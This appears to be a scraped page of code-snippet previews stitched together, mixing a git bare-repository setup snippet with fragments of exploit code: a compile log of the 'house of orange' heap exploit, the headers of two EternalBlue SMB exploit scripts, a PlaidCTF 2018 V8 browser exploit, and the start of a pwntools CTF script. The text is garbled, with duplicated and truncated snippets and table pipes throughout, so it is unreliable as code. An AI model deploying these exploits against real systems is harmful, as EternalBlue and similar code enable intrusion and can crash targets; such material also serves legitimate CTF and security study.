Setup remote repository:
ssh git@example.com
mkdir my_project.git
cd my_project.git
git init --bare
On local machine:
cd my_project
| $ gcc house_of_orange.c -o house_of_orange | |
| house_of_orange.c: In function ‘main’: | |
| house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
| ^ | |
| house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x30) = -1; | |
| ^ | |
| $ ./house_of_orange |
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
Setup remote repository:
ssh git@example.com
mkdir my_project.git
cd my_project.git
git init --bare
On local machine:
cd my_project
| /* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
| /* ### Utils, thanks saelo ### */ | |
| // | |
| // Tiny module that provides big (64bit) integers. | |
| // | |
| // Copyright (c) 2016 Samuel Groß | |
| // |
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
| """Demonstrates how to construct and send raw Ethernet packets on the | |
| network. | |
| You probably need root privs to be able to bind to the network interface, | |
| e.g.: | |
| $ sudo python sendeth.py | |
| """ | |
| from socket import * |
| from pwn import * | |
| from pow import solve_pow | |
| #from network_util import * | |
| import struct | |
| #fd = open("m68k.bin", "r") | |
| #shellcode = fd.read() | |
| #fd.close() | |
| def p32(v): | |
| return struct.pack(">i",v) |